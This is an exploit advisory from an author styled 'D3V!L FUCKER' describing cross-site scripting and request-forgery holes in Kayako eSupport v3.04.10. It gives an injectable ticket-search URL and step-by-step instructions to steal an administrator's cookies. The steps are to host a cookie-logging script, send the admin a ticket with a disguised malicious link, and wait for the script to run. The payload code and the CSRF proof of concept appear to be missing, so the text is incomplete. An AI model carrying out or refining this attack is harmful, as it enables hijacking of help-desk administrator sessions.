################################################################################################################# [+] Exploit Title : kayako (xss/xsrf) Remote Vulnerabilities [+] Author : By D3V!L FUCKER [+] Script Link : http://www.kayako.com/solutions/esupport/ [+] Version : Kayako eSupport v3.04.10 [+] Tested on : linux ubuntu 9.10 [+] Code : ################################################################################################################# +++++++++++++++++++++++++ http://server/path/staff/index.php?_m=tickets&_a=manage&s_query="> ================================================================== PoC -- [+] Make 2 files and upload to your host : [+]cookie.php - > Put in this File That Code: [+]log.txt - > CHMOD it 777 and put in the same directory with cookie.php [+]Exploit: ------- 1) Register in The SIte 2)Open New Ticket 3)We Put in To:admin name Subject: Some Subject Message: http://server/path/staff/index.php?_m=tickets&_a=manage&s_query="> //Cover The Link By Any Thing Use Your Brain The js code Worked When The admin Read The Message +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 2) Xsrf POC +++++++++++++++++









################################################################################################################